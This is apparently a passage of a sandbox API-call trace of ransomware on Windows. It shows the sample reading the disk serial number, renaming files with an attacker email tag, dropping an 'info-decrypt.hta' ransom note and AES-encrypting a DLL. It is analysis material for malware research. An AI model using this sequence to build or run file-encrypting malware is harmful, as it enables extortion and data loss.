[1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e43c | out: ppvObject=0x6d8e43c*=0x0) returned 0x80004002 [0177.158] WbemLocator:IUnknown:AddRef (This=0xb5b6f4) returned 0x3 [0177.158] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8df7c | out: ppvObject=0x6d8df7c*=0x0) returned 0x80004002 [0177.159] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8df2c | out: ppvObject=0x6d8df2c*=0x0) returned 0x80004002 [0177.159] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8df38 | out: ppvObject=0x6d8df38*=0xb5b654) returned 0x0 [0177.159] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b654, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8df40 | out: pCid=0x6d8df40*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0177.159] WbemLocator:IUnknown:Release (This=0xb5b654) returned 0x3 [0177.159] CoGetContextToken (in: pToken=0x6d8df98 | out: pToken=0x6d8df98) returned 0x0 [0177.160] CoGetContextToken (in: pToken=0x6d8e3a0 | out: pToken=0x6d8e3a0) returned 0x0 [0177.160] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e430 | out: ppvObject=0x6d8e430*=0xb5b6dc) returned 0x0 [0177.160] WbemLocator:IRpcOptions:Query (in: This=0xb5b6dc, pPrx=0xb5b6f4, dwProperty=2, pdwValue=0x6d8e458 | out: pdwValue=0x6d8e458) returned 0x80004002 [0177.160] WbemLocator:IUnknown:Release (This=0xb5b6dc) returned 0x3 [0177.160] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x2 [0177.160] CoGetContextToken (in: pToken=0x6d8e978 | out: pToken=0x6d8e978) returned 0x0 [0177.160] CoGetContextToken (in: pToken=0x6d8e8d8 | out: pToken=0x6d8e8d8) returned 0x0 [0177.160] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x6d8e9a8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6d8e9a4 | out: ppvObject=0x6d8e9a4*=0x6033164) returned 0x0 [0177.160] WbemLocator:IUnknown:AddRef (This=0x6033164) returned 0x4 [0177.160] WbemLocator:IUnknown:Release (This=0x6033164) returned 0x3 [0177.160] WbemLocator:IUnknown:Release (This=0x6033164) returned 0x2 [0177.160] SysStringLen (param_1=0x0) returned 0x0 [0177.160] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60308d0, puCount=0x6d8ed3c | out: puCount=0x6d8ed3c*=0x0) returned 0x0 [0177.160] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=2, puBuffLength=0x6d8ed38*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed38*=0x20, pszText=0x0) returned 0x0 [0177.160] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=2, puBuffLength=0x6d8ed38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0177.160] CoGetContextToken (in: pToken=0x6d8e9a8 | out: pToken=0x6d8e9a8) returned 0x0 [0177.160] WbemLocator:IUnknown:AddRef (This=0xb5b6f4) returned 0x3 [0177.160] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e83c | out: ppvObject=0x6d8e83c*=0xb5b6f4) returned 0x0 [0177.160] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x3 [0177.160] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x2 [0177.160] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=2, puBuffLength=0x6d8ed40*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed40*=0x20, pszText=0x0) returned 0x0 [0177.161] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=2, puBuffLength=0x6d8ed40*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed40*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0177.161] IWbemServices:GetObject (in: This=0x6033164, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6d8ecf4*=0x0, ppCallResult=0x0 | out: ppObject=0x6d8ecf4*=0x60287e0, ppCallResult=0x0) returned 0x0 [0177.905] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030860, puCount=0x6d8ecf4 | out: puCount=0x6d8ecf4*=0x2) returned 0x0 [0177.905] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=4, puBuffLength=0x6d8ecf0*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecf0*=0xf, pszText=0x0) returned 0x0 [0177.905] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=4, puBuffLength=0x6d8ecf0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecf0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0177.905] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x37d9a80*=0, plFlavor=0x37d9a84*=0 | out: pVal=0x6d8ecf0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x37d9a80*=8, plFlavor=0x37d9a84*=0) returned 0x0 [0177.905] SysStringByteLen (bstr="9C354B42") returned 0x10 [0177.905] SysStringByteLen (bstr="9C354B42") returned 0x10 [0177.905] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x37d9a80*=8, plFlavor=0x37d9a84*=0 | out: pVal=0x6d8ecf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x37d9a80*=8, plFlavor=0x37d9a84*=0) returned 0x0 [0177.905] SysStringByteLen (bstr="9C354B42") returned 0x10 [0177.905] SysStringByteLen (bstr="9C354B42") returned 0x10 [0177.906] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL", lpFilePart=0x0) returned 0x3f [0177.906] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x62 [0177.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed58) returned 1 [0177.906] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll"), fInfoLevelId=0x0, lpFileInformation=0x6d8edd4 | out: lpFileInformation=0x6d8edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2395fea0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0177.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed54) returned 1 [0177.906] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0177.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ee9c) returned 1 [0177.907] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters", nBufferLength=0x105, lpBuffer=0x6d8e9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters", lpFilePart=0x0) returned 0x36 [0177.907] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", nBufferLength=0x105, lpBuffer=0x6d8e978, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", lpFilePart=0x0) returned 0x37 [0177.907] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*", lpFindFileData=0x6d8ebc4 | out: lpFindFileData=0x6d8ebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7efd0 [0177.907] FindNextFileW (in: hFindFile=0xb7efd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.908] FindNextFileW (in: hFindFile=0xb7efd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x9770, dwReserved0=0x0, dwReserved1=0x0, cFileName="msgfilt.dll", cAlternateFileName="")) returned 1 [0177.908] FindNextFileW (in: hFindFile=0xb7efd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x6b29d7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x140790, dwReserved0=0x0, dwReserved1=0x0, cFileName="odffilt.dll", cAlternateFileName="")) returned 1 [0177.908] FindNextFileW (in: hFindFile=0xb7efd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x16af90, dwReserved0=0x0, dwReserved1=0x0, cFileName="offfiltx.dll", cAlternateFileName="")) returned 1 [0177.908] FindNextFileW (in: hFindFile=0xb7efd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46d35b00, ftCreationTime.dwHighDateTime=0x1cba077, ftLastAccessTime.dwLowDateTime=0xd9e40080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x46d35b00, ftLastWriteTime.dwHighDateTime=0x1cba077, nFileSizeHigh=0x0, nFileSizeLow=0x206b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISFILT.DLL", cAlternateFileName="")) returned 1 [0177.908] FindNextFileW (in: hFindFile=0xb7efd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.908] FindClose (in: hFindFile=0xb7efd0 | out: hFindFile=0xb7efd0) returned 1 [0177.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee5c) returned 1 [0177.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee68) returned 1 [0177.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ee9c) returned 1 [0177.909] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters", nBufferLength=0x105, lpBuffer=0x6d8e9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters", lpFilePart=0x0) returned 0x36 [0177.909] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", nBufferLength=0x105, lpBuffer=0x6d8e978, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", lpFilePart=0x0) returned 0x37 [0177.909] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*", lpFindFileData=0x6d8ebc4 | out: lpFindFileData=0x6d8ebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7efd0 [0177.909] FindNextFileW (in: hFindFile=0xb7efd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.909] FindNextFileW (in: hFindFile=0xb7efd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x9770, dwReserved0=0x0, dwReserved1=0x0, cFileName="msgfilt.dll", cAlternateFileName="")) returned 1 [0177.909] FindNextFileW (in: hFindFile=0xb7efd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x6b29d7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x140790, dwReserved0=0x0, dwReserved1=0x0, cFileName="odffilt.dll", cAlternateFileName="")) returned 1 [0177.909] FindNextFileW (in: hFindFile=0xb7efd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x16af90, dwReserved0=0x0, dwReserved1=0x0, cFileName="offfiltx.dll", cAlternateFileName="")) returned 1 [0177.910] FindNextFileW (in: hFindFile=0xb7efd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46d35b00, ftCreationTime.dwHighDateTime=0x1cba077, ftLastAccessTime.dwLowDateTime=0xd9e40080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x46d35b00, ftLastWriteTime.dwHighDateTime=0x1cba077, nFileSizeHigh=0x0, nFileSizeLow=0x206b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISFILT.DLL", cAlternateFileName="")) returned 1 [0177.910] FindNextFileW (in: hFindFile=0xb7efd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46d35b00, ftCreationTime.dwHighDateTime=0x1cba077, ftLastAccessTime.dwLowDateTime=0xd9e40080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x46d35b00, ftLastWriteTime.dwHighDateTime=0x1cba077, nFileSizeHigh=0x0, nFileSizeLow=0x206b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISFILT.DLL", cAlternateFileName="")) returned 0 [0177.910] FindClose (in: hFindFile=0xb7efd0 | out: hFindFile=0xb7efd0) returned 1 [0177.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee5c) returned 1 [0177.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee68) returned 1 [0177.910] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll", lpFilePart=0x0) returned 0x42 [0177.910] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\info-decrypt.hta", lpFilePart=0x0) returned 0x47 [0177.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0177.910] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0177.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0177.910] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll", lpFilePart=0x0) returned 0x42 [0177.910] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e7b8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\info-decrypt.hta", lpFilePart=0x0) returned 0x47 [0177.911] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecac) returned 1 [0177.911] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x27c [0177.911] GetFileType (hFile=0x27c) returned 0x1 [0177.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8eca8) returned 1 [0177.911] GetFileType (hFile=0x27c) returned 0x1 [0177.911] WriteFile (in: hFile=0x27c, lpBuffer=0x37dd678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6d8ed70, lpOverlapped=0x0 | out: lpBuffer=0x37dd678*, lpNumberOfBytesWritten=0x6d8ed70*=0x1000, lpOverlapped=0x0) returned 1 [0177.912] WriteFile (in: hFile=0x27c, lpBuffer=0x37dd678*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6d8ed44, lpOverlapped=0x0 | out: lpBuffer=0x37dd678*, lpNumberOfBytesWritten=0x6d8ed44*=0x55e, lpOverlapped=0x0) returned 1 [0177.913] CloseHandle (hObject=0x27c) returned 1 [0177.913] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll", lpFilePart=0x0) returned 0x42 [0177.913] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0177.913] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), fInfoLevelId=0x0, lpFileInformation=0x37de694 | out: lpFileInformation=0x37de694*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x9770)) returned 1 [0177.913] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0177.913] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll", lpFilePart=0x0) returned 0x42 [0177.913] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0177.913] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x27c [0177.913] GetFileType (hFile=0x27c) returned 0x1 [0177.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0177.914] GetFileType (hFile=0x27c) returned 0x1 [0177.914] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0x9770 [0177.914] ReadFile (in: hFile=0x27c, lpBuffer=0x37de894, nNumberOfBytesToRead=0x9770, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0x37de894*, lpNumberOfBytesRead=0x6d8edac*=0x9770, lpOverlapped=0x0) returned 1 [0177.915] CloseHandle (hObject=0x27c) returned 1 [0177.915] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0x66ba9e8) returned 1 [0177.916] CryptGenRandom (in: hProv=0x66ba9e8, dwLen=0x10, pbBuffer=0x37e8358 | out: pbBuffer=0x37e8358) returned 1 [0179.032] CryptImportKey (in: hProv=0x66ba9e8, pbData=0x366ef28, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7f550) returned 1 [0179.032] CryptContextAddRef (hProv=0x66ba9e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0179.032] CryptContextAddRef (hProv=0x66ba9e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0179.032] CryptDuplicateKey (in: hKey=0xb7f550, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7f290) returned 1 [0179.032] CryptContextAddRef (hProv=0x66ba9e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0179.033] CryptSetKeyParam (hKey=0xb7f290, dwParam=0x4, pbData=0x366f008*=0x1, dwFlags=0x0) returned 1 [0179.033] CryptSetKeyParam (hKey=0xb7f290, dwParam=0x1, pbData=0x366efd4, dwFlags=0x0) returned 1 [0179.033] CryptEncrypt (in: hKey=0xb7f290, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x366f018*, pdwDataLen=0x6d8ed78*=0x9780, dwBufLen=0x9780 | out: pbData=0x366f018*, pdwDataLen=0x6d8ed78*=0x9780) returned 1 [0179.033] CryptEncrypt (in: hKey=0xb7f290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36787bc*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x36787bc*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0179.035] CryptDestroyKey (hKey=0xb7f550) returned 1 [0179.035] CryptReleaseContext (hProv=0x66ba9e8, dwFlags=0x0) returned 1 [0179.035] 